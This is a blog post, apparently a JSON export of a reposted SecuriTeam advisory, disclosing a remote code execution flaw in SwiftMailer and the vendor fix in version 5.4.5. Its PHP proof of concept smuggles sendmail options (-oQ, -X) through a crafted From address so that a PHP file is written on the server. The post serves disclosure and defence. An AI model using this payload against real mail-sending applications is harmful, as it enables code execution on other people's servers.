{"id":6275,"date":"2017-01-23T14:07:58","date_gmt":"2017-01-23T22:07:58","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-126\/"},"modified":"2017-01-23T14:07:58","modified_gmt":"2017-01-23T22:07:58","slug":"news-126","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-126\/","title":{"rendered":"SSD Advisory \u2013 SwiftMailer Remote Code Execution"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following report describes a remote code execution vulnerability found in SwiftMailer. The vulnerability allows an attacker to inject arbitrary parameters into the <em>sendmail program<\/em> due to insufficient address sanitization. Swift Mailer integrates into any web app written in PHP 5, offering a flexible object-oriented approach to sending emails with a multitude of features.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Dawid Golunski (https:\/\/legalhackers.com\/), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>When using SwiftMailer to send emails with the Sendmail transport, a malicious user might be able to inject arbitrary parameters into the <em>sendmail program<\/em> due to insufficient address sanitization. If an attacker can control email headers, he could bypass the sanitization by adding additional quote characters within a malicious email address.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<pre><code class=\"language-php\">&lt;?php\nrequire_once 'swiftmailer-5.x\/lib\/swift_required.php';\n\n\/\/ Sendmail transport\n\/\/$transport = Swift_SendmailTransport::newInstance('\/usr\/sbin\/sendmail -bs');\n\n\/\/ Mail transport (PHP mail(); extra parameters are handed to the local sendmail binary)\n$transport = Swift_MailTransport::newInstance();\n\n\/\/ Create the Mailer using your created Transport\n$mailer = Swift_Mailer::newInstance($transport);\n\n\/\/ Create a message; the From address carries an embedded single quote\n\/\/ followed by extra sendmail options (-oQ, -X) that survive the sanitization\n$message = Swift_Message::newInstance('Wonderful Subject')\n  -&gt;setFrom(array('\"john\\' -oQ\/tmp\/ -X\/tmp\/exp.php heh\"@test.com' =&gt; 'John Doe'))\n  -&gt;setTo(array('receiver@domain.org', 'other@domain.org' =&gt; 'A name'))\n  -&gt;setBody('Here is the message itself')\n  ;\n\n\/\/ Send the message\n$result = $mailer-&gt;send($message);\n<\/code><\/pre>\n<p>In this example, the -X and -oQ parameters would be injected into the sendmail program and, if the MTA in use was Sendmail, a \/tmp\/exp.php file would be written out as a result.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released SwiftMailer version 5.4.5 to address the vulnerability.<\/p>\n<\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2920\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following report describes a remote code execution vulnerability found in SwiftMailer. The vulnerability allows an attacker to inject arbitrary parameters into the sendmail program due to insufficient address sanitization. Swift Mailer integrates into any web app written in PHP 5, offering a flexible object-oriented approach to sending emails with a multitude of features Credit An independent security &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2920\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 SwiftMailer Remote Code Execution<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6275","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6275","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6275"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6275\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6275"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}